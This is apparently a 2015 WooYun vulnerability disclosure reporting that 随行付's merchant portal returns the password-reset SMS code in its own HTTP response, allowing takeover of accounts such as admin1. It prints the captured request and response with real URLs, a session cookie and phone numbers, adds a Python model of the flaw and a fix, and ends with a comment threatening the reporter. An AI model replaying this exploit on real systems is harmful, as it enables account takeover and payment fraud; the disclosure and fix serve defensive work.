随行付: arbitrary password reset, large sums of money involved, POS terminals can be swiped to cash out

ID: 125569
URL: http://www.wooyun.org/bug.php?action=view&id=125569
Vulnerability status: vendor could not be contacted, or the vendor actively ignored the report
Vulnerability title: 随行付 arbitrary password reset, large sums of money involved, POS terminals can be swiped to cash out
Vulnerability type: design flaw / logic error
Vendor: 北京随行付信息技术有限公司
White hat: 奥特曼
Submitted: 2015-08-07 13:02:00
Published: 2015-09-21 13:04:00
Fixed: (not set)
Confirmed: 0000-00-00 00:00:00
Confirm Spend: -1
Tags:
Followers: 0
Favorites: 0
White hat rating:
White hat self-assessment: rank 15
Vendor rating:
Vendor assessment: rank 15
Summary
None
Details

The reset flow on the forgot-password page can be intercepted: the SMS verification code is captured and then used to reset the password.
Password recovery is done at http://www.vbill.cn/mss/SafePwd/safe_rese_pwd.htm.
Accounts include admin1, admin2, admin3, admin4, and so on.
Choose recovery via the bound phone number; capturing the traffic with a local proxy yields the SMS verification code, after which the password can be reset.
After resetting the password, log in at http://www.vbill.cn/mss/login/loginOut.htm?lgUrl=
1. Account admin1, password qq123456; 2. account admin2, password qq123456
And so on: as long as the account name matches, its password can be reset.

POST /mss/SafePwd/sendPhoneMsg.htm HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://www.vbill.cn/mss/SafePwd/safe_rese_pwd3.htm?type=pwdMsg&uuid=aec1c557e4f445d59a3c91fbac8aecfe
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: www.vbill.cn
Content-Length: 19
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: JSESSIONID=5E527A30530992B3F52B89DEE575E60D; _5t_trace_sid=87b524b3ba0afe81013dd448188d103e; _5t_trace_tms=1

bindTel=13626131230

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/json;charset=UTF-8
Content-Language: zh-CN
Date: Thu, 09 Jul 2015 11:01:11 GMT
Content-Length: 247

{"retInf":"6396","safeBean":{"uuid":null,"inMno":null,"safeLevel":null,"bindTel":"18860900198","payPwd":null,"question":null,"question2":null,"answer":null,"answer2":null,"legPerCrdNo":null,"user":null,"retMsg":null,"usaPwd":null,"password":null}}

POC (screenshots 132.png, 131.png, 1.jpg and 2.png; images not reproduced here)


Remediation

Improper design; fix it.
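The root cause visible in the capture is that sendPhoneMsg.htm returns the SMS verification code in the retInf field of its own JSON response, so the party who submitted bindTel reads the code without ever receiving the SMS. The Python model below is an example added here, not the vendor's code: it shows that pattern beside a hardened handler that keeps the code server-side, expires it, limits guesses and makes it single-use, plus a check a tester can run on a response body. OTP_STORE, SENT_SMS, the uuid parameter and the SMS text are assumptions.

```python
import hmac
import json
import secrets
import time

# Constructed stand-ins for the server's OTP storage and SMS gateway (assumptions).
OTP_STORE = {}    # uuid -> {"code": str, "expires": float, "tries": int}
SENT_SMS = []     # (phone, text) pairs the fake gateway "sent"
OTP_TTL, MAX_TRIES = 300, 5   # seconds a code stays valid; wrong guesses allowed

def issue_code(uuid, bind_tel, digits):
    """Generate a fresh code, store it server-side and hand it to the SMS gateway."""
    code = f"{secrets.randbelow(10 ** digits):0{digits}d}"
    OTP_STORE[uuid] = {"code": code, "expires": time.time() + OTP_TTL, "tries": 0}
    SENT_SMS.append((bind_tel, f"Your verification code is {code}"))
    return code

def send_phone_msg_vulnerable(uuid, bind_tel):
    """Models the reported flaw: retInf carries the code, so the caller reads it straight from the HTTP response."""
    code = issue_code(uuid, bind_tel, 4)
    return json.dumps({"retInf": code, "safeBean": {"bindTel": bind_tel}})

def send_phone_msg_fixed(uuid, bind_tel):
    """Hardened form: the code never leaves the server; only a status is returned."""
    issue_code(uuid, bind_tel, 6)
    return json.dumps({"retInf": "sent"})

def verify_code(uuid, submitted):
    """Server-side check: not expired, attempt-limited, constant-time, single-use."""
    entry = OTP_STORE.get(uuid)
    if entry is None or time.time() > entry["expires"]:
        return False
    entry["tries"] += 1
    if entry["tries"] > MAX_TRIES:
        OTP_STORE.pop(uuid, None)   # too many guesses: invalidate the code
        return False
    if hmac.compare_digest(entry["code"], str(submitted)):
        OTP_STORE.pop(uuid, None)   # a code is consumed on first success
        return True
    return False

def response_leaks_code(body, code):
    """Tester's check: does any string value in the JSON body equal the code?"""
    def walk(v):
        if isinstance(v, dict):
            return any(walk(x) for x in v.values())
        if isinstance(v, list):
            return any(walk(x) for x in v)
        return isinstance(v, str) and v == code
    return walk(json.loads(body))
```

In a real deployment the code would also be bound to the session that requested it and the response checked in an integration test with response_leaks_code, so a regression like the one reported is caught before release.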

Status history: 2015-08-07: actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed
2015-09-21: the vendor has actively ignored the vulnerability; details disclosed to the public
Vendor reply: (not set)
Response: vendor could not be contacted, or the vendor actively rejected the vulnerability. Rank: 15 (WooYun assessment)
Comments (content / commenter / likes / time)

OP, be careful when you're out walking, someone might be following you....

这只猪 | 0 | 2015-09-21 15:46:00